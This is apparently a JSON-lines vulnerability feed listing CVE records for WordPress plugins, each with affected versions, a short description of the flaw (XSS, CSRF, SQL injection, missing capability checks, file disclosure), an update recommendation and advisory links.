{"CVE_ID":"CVE-2023-1087","slug":"wc-sales-notification","versionEndExcluding":"1.2.3","description":"The WC Sales Notification WordPress plugin before 1.2.3 does not have a CSRF check when activating plugins, which could allow attackers to make logged-in admins activate arbitrary plugins present on the blog via a CSRF attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/356c89a1-81b6-4600-9291-1a74788af7f9\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/356c89a1-81b6-4600-9291-1a74788af7f9\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2308","slug":"elementinvader-addons-for-elementor","versionImpact":"1.2.2","versionEndExcluding":"1.2.3","description":"The ElementInvader Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the button link in the EliSlider in all versions up to, and including, 1.2.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40a272dc-cb2a-472f-be42-733efcb2fa61?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40a272dc-cb2a-472f-be42-733efcb2fa61?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3050556%40elementinvader-addons-for-elementor&new=3050556%40elementinvader-addons-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3050556%40elementinvader-addons-for-elementor&new=3050556%40elementinvader-addons-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8031","slug":"secure-downloads","versionImpact":"1.2.2","versionEndExcluding":"1.2.3","description":"The Secure Downloads WordPress plugin before 1.2.3 does not properly restrict which files can be downloaded. This makes it possible for authenticated attackers, with admin-level access and above, to download arbitrary files that may contain sensitive information like wp-config.php.","recommendation":"Update to version 1.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c6f54e6f-0a50-424f-ae3a-00b9880d9f13\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c6f54e6f-0a50-424f-ae3a-00b9880d9f13\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11880","slug":"b-testimonial","versionImpact":"1.2.2","versionEndExcluding":"1.2.3","description":"The B Testimonial \u2013 testimonial plugin for WP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'b_testimonial' shortcode in all versions up to, and including, 1.2.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/b-testimonial\\\/tags\\\/1.2.2\\\/inc\\\/theme\\\/one.php#L18\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/b-testimonial\\\/tags\\\/1.2.2\\\/inc\\\/theme\\\/one.php#L18\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3200155\\\/b-testimonial\\\/trunk\\\/inc\\\/theme\\\/one.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3200155\\\/b-testimonial\\\/trunk\\\/inc\\\/theme\\\/one.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3200155%40b-testimonial&new=3200155%40b-testimonial&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3200155%40b-testimonial&new=3200155%40b-testimonial&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea251110-02fa-4f4e-a578-855d3331b200?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea251110-02fa-4f4e-a578-855d3331b200?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5030","slug":"cm-table-of-content","versionImpact":"1.2.2","versionEndExcluding":"1.2.3","description":"The CM Table Of Contents WordPress plugin before 1.2.3 does not have a CSRF check in place when resetting its settings, which could allow attackers to make a logged-in admin perform such an action via a CSRF attack.","recommendation":"Update to version 1.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2c2e994c-31bd-4de4-9480-b86f980d4130\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2c2e994c-31bd-4de4-9480-b86f980d4130\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5957","slug":"guest-support","versionImpact":"1.2.2","versionEndExcluding":"1.2.3","description":"The Guest Support \u2013 Complete customer support ticket system for WordPress plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'deleteMassTickets' function in all versions up to, and including, 1.2.2. This makes it possible for unauthenticated attackers to delete arbitrary support tickets.","recommendation":"Update to version 1.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/guest-support\\\/trunk\\\/includes\\\/library\\\/ajax.php#L133\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/guest-support\\\/trunk\\\/includes\\\/library\\\/ajax.php#L133\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/guest-support\\\/trunk\\\/includes\\\/library\\\/class-dbquery.php#L736\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/guest-support\\\/trunk\\\/includes\\\/library\\\/class-dbquery.php#L736\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3322664\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3322664\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6e5dde2-f9f9-4a64-9174-e5e6e9fe1b23?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6e5dde2-f9f9-4a64-9174-e5e6e9fe1b23?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12713","slug":"sureforms","versionImpact":"1.2.2","versionEndExcluding":"1.2.3","description":"The SureForms \u2013 Drag and Drop Form Builder for WordPress plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.2.2 via the handle_export_form() function due to a missing capability check. This makes it possible for unauthenticated attackers to export data from password protected, private, or draft posts that they should not have access to.","recommendation":"Update to version 1.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3215338\\\/sureforms\\\/tags\\\/1.2.3\\\/inc\\\/export.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3215338\\\/sureforms\\\/tags\\\/1.2.3\\\/inc\\\/export.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/412d5fa7-08fc-402a-bcac-b2dff87de861?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/412d5fa7-08fc-402a-bcac-b2dff87de861?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-24666","slug":"hyve-lite","versionImpact":"1.2.2","versionEndExcluding":"1.2.3","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeIsle AI Chatbot for WordPress \u2013 Hyve Lite allows Stored XSS. This issue affects AI Chatbot for WordPress \u2013 Hyve Lite: from n\/a through 1.2.2.","recommendation":"Update to version 1.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/hyve-lite\\\/vulnerability\\\/wordpress-hyve-lite-plugin-1-2-2-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/hyve-lite\\\/vulnerability\\\/wordpress-hyve-lite-plugin-1-2-2-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13701","slug":"stklcode-liveticker","versionImpact":"1.2.2","versionEndExcluding":"1.2.3","description":"The Liveticker (by stklcode) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'liveticker' shortcode in all versions up to, and including, 1.2.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3234940%40stklcode-liveticker&new=3234940%40stklcode-liveticker&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3234940%40stklcode-liveticker&new=3234940%40stklcode-liveticker&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4edf78c-cd17-42dd-90dc-10946e79d57b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4edf78c-cd17-42dd-90dc-10946e79d57b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13718","slug":"flexible-wishlist","versionImpact":"1.2.26","versionEndExcluding":"1.2.27","description":"The Flexible Wishlist for WooCommerce \u2013 Ecommerce Wishlist & Save for later plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.26. This is due to missing or incorrect nonce validation on several functions. This makes it possible for unauthenticated attackers to modify\/update\/create other user's wishlists via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.2.27, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=flexible-wishlist\\\/tags\\\/1.2.26&new_path=\\\/flexible-wishlist\\\/tags\\\/1.2.27&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=flexible-wishlist\\\/tags\\\/1.2.26&new_path=\\\/flexible-wishlist\\\/tags\\\/1.2.27&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f2b4030-92b1-4795-b72e-761632dd523d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f2b4030-92b1-4795-b72e-761632dd523d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6555","slug":"email-subscribe","versionImpact":"1.2.19","versionEndExcluding":"1.2.20","description":"The Email Subscription Popup WordPress plugin before 1.2.20 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 1.2.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/58803934-dbd3-422d-88e7-ebbc5e8c0886\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/58803934-dbd3-422d-88e7-ebbc5e8c0886\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2578","slug":"ameliabooking","versionImpact":"1.2.19","versionEndExcluding":"1.2.20","description":"The Booking for Appointments and Events Calendar \u2013 Amelia plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 1.2.19 via the 'wpAmeliaApiCall' function. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 1.2.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ameliabooking\\\/trunk\\\/ameliabooking.php#L172\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ameliabooking\\\/trunk\\\/ameliabooking.php#L172\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ameliabooking\\\/trunk\\\/src\\\/Application\\\/Commands\\\/Entities\\\/GetEntitiesCommandHandler.php#L127\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ameliabooking\\\/trunk\\\/src\\\/Application\\\/Commands\\\/Entities\\\/GetEntitiesCommandHandler.php#L127\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261318\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261318\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6806e07b-96bf-43ad-a3ac-2105e7449e3c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6806e07b-96bf-43ad-a3ac-2105e7449e3c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6684","slug":"ibtana-visual-editor","versionImpact":"1.2.2","versionEndExcluding":"1.2.2.1","description":"The Ibtana \u2013 WordPress Website Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'ive' shortcode in versions up to, and including, 1.2.2 due to insufficient input sanitization and output escaping on 'width' and 'height' user supplied attribute. This makes it possible for authenticated attackers with contributor level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0b09d496-0e03-48a4-acf7-57febe18ed0a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0b09d496-0e03-48a4-acf7-57febe18ed0a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ibtana-visual-editor\\\/trunk\\\/ive-countdown.php?rev=2965648#L633\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ibtana-visual-editor\\\/trunk\\\/ive-countdown.php?rev=2965648#L633\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3006647\\\/ibtana-visual-editor\\\/trunk\\\/ive-countdown.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3006647\\\/ibtana-visual-editor\\\/trunk\\\/ive-countdown.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6063","slug":"wp-fastest-cache","versionImpact":"1.2.1","versionEndExcluding":"1.2.2","description":"The WP Fastest Cache WordPress plugin before 1.2.2 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.","recommendation":"Update to version 1.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/30a74105-8ade-4198-abe2-1c6f2967443e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/30a74105-8ade-4198-abe2-1c6f2967443e\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/blog\\\/unauthenticated-sql-injection-vulnerability-addressed-in-wp-fastest-cache-1-2-2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/blog\\\/unauthenticated-sql-injection-vulnerability-addressed-in-wp-fastest-cache-1-2-2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2362","slug":"counter-box","versionEndExcluding":"1.2.2","description":"The Float menu WordPress plugin before 5.0.2, Bubble Menu WordPress plugin before 3.0.4, Button Generator WordPress plugin before 2.3.5, Calculator Builder WordPress plugin before 1.5.1, Counter Box WordPress plugin before 1.2.2, Floating Button WordPress plugin before 5.3.1, Herd Effects WordPress plugin before 5.2.2, Popup Box WordPress plugin before 2.2.2, Side Menu Lite WordPress plugin before 4.0.2, Sticky Buttons WordPress plugin before 3.1.1, Wow Skype Buttons WordPress plugin before 4.0.2, WP Coder WordPress plugin before 2.5.6 do not escape the page parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11806","slug":"pkt1-centro-de-envios","versionImpact":"1.2.1","versionEndExcluding":"1.2.2","description":"The PKT1 Centro de envios plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'success' and 'error' parameters in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pkt1-centro-de-envios\\\/trunk\\\/views\\\/admin\\\/settings_page.php#L8\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pkt1-centro-de-envios\\\/trunk\\\/views\\\/admin\\\/settings_page.php#L8\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c924b317-97ec-43b8-9bf3-ed7618743de7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c924b317-97ec-43b8-9bf3-ed7618743de7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2568","slug":"vayu-blocks","versionImpact":"1.2.1","versionEndExcluding":"1.2.2","description":"The Vayu Blocks \u2013 Gutenberg Blocks for WordPress & WooCommerce plugin for WordPress is vulnerable to unauthorized access and modification of data due to missing capability checks on the 'vayu_blocks_get_toggle_switch_values_callback' and 'vayu_blocks_save_toggle_switch_callback' functions in versions 1.0.4 to 1.2.1. This makes it possible for unauthenticated attackers to read plugin options and update any option with a key name ending in '_value'.","recommendation":"Update to version 1.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vayu-blocks\\\/trunk\\\/inc\\\/function.php#L126\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vayu-blocks\\\/trunk\\\/inc\\\/function.php#L126\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vayu-blocks\\\/trunk\\\/inc\\\/function.php#L133\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vayu-blocks\\\/trunk\\\/inc\\\/function.php#L133\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vayu-blocks\\\/trunk\\\/inc\\\/function.php#L139\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vayu-blocks\\\/trunk\\\/inc\\\/function.php#L139\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vayu-blocks\\\/trunk\\\/inc\\\/function.php#L182\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vayu-blocks\\\/trunk\\\/inc\\\/function.php#L182\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3263702\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3263702\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/27ca93a1-3dfc-4bbd-834a-1c04d9e22ebf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/27ca93a1-3dfc-4bbd-834a-1c04d9e22ebf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4702","slug":"mega-elements-addons-for-elementor","versionImpact":"1.2.1","versionEndExcluding":"1.2.2","description":"The Mega Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Button widget in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3808ca2a-e78e-4118-890b-c22a71f8e855?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3808ca2a-e78e-4118-890b-c22a71f8e855?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3085457\\\/mega-elements-addons-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3085457\\\/mega-elements-addons-for-elementor\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0282","slug":"yourchannel","versionEndExcluding":"1.2.2","description":"The YourChannel WordPress plugin before 1.2.2 does not sanitize and escape some parameters, which could allow users with a role as low as Subscriber to perform Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/93693d45-5217-4571-bae5-aab8878cfe62\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/93693d45-5217-4571-bae5-aab8878cfe62\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-1760","slug":"core-control","versionImpact":"1.2.1","versionEndExcluding":"1.2.2","description":"The Core Control WordPress plugin through 1.2.1 does not have a CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack.","recommendation":"Update to version 1.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c7906b1d-25c9-4f34-bd02-66824878b88e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c7906b1d-25c9-4f34-bd02-66824878b88e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12201","slug":"hash-form","versionImpact":"1.2.1","versionEndExcluding":"1.2.2","description":"The Hash Form \u2013 Drag & Drop Form Builder plugin for WordPress is vulnerable to unauthorized access due to a missing capability check when creating form styles in all versions up to, and including, 1.2.1. This makes it possible for authenticated attackers, with Contributor-level access and above, to create new form styles.","recommendation":"Update to version 1.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3205245%40hash-form&new=3205245%40hash-form&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3205245%40hash-form&new=3205245%40hash-form&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb81b2ce-583b-411c-b0f5-a233e0d1986b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb81b2ce-583b-411c-b0f5-a233e0d1986b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9541","slug":"news-kit-elementor-addons","versionImpact":"1.2.1","versionEndExcluding":"1.2.2","description":"The News Kit Elementor Addons plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.2.1 via the render function in includes\/widgets\/canvas-menu\/canvas-menu.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft Elementor template data.","recommendation":"Update to version 1.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ffc5408c-ca31-4cb6-8cb5-063acbbad01e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ffc5408c-ca31-4cb6-8cb5-063acbbad01e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169975\\\/news-kit-elementor-addons\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169975\\\/news-kit-elementor-addons\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0362","slug":"themify-portfolio-post","versionEndExcluding":"1.2.2","description":"Themify Portfolio Post WordPress plugin before 1.2.2 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/95ee3257-cfda-480d-b3f7-28235564cf6d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/95ee3257-cfda-480d-b3f7-28235564cf6d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4798","slug":"user-avatar-reloaded","versionImpact":"1.2.1","versionEndExcluding":"1.2.2","description":"The User Avatar WordPress plugin before 1.2.2 does not properly sanitize and escape certain of its shortcodes attributes, which could allow relatively low-privileged users like contributors to conduct Stored XSS attacks.","recommendation":"Update to version 1.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/273a95bf-39fe-4ba7-bc14-9527acfd9f42\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/273a95bf-39fe-4ba7-bc14-9527acfd9f42\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12466","slug":"proofreading","versionImpact":"1.2.1.1","versionEndExcluding":"1.2.2","description":"The Proofreading plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'nonce' parameter in all versions up to, and including, 1.2.1.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/proofreading\\\/tags\\\/1.2.1.1\\\/admin\\\/partials\\\/proofreading-admin-display.php#L103\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/proofreading\\\/tags\\\/1.2.1.1\\\/admin\\\/partials\\\/proofreading-admin-display.php#L103\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3223417%40proofreading&new=3223417%40proofreading&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3223417%40proofreading&new=3223417%40proofreading&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3f666a3-6287-4c9b-94d3-7bc457701af2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3f666a3-6287-4c9b-94d3-7bc457701af2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
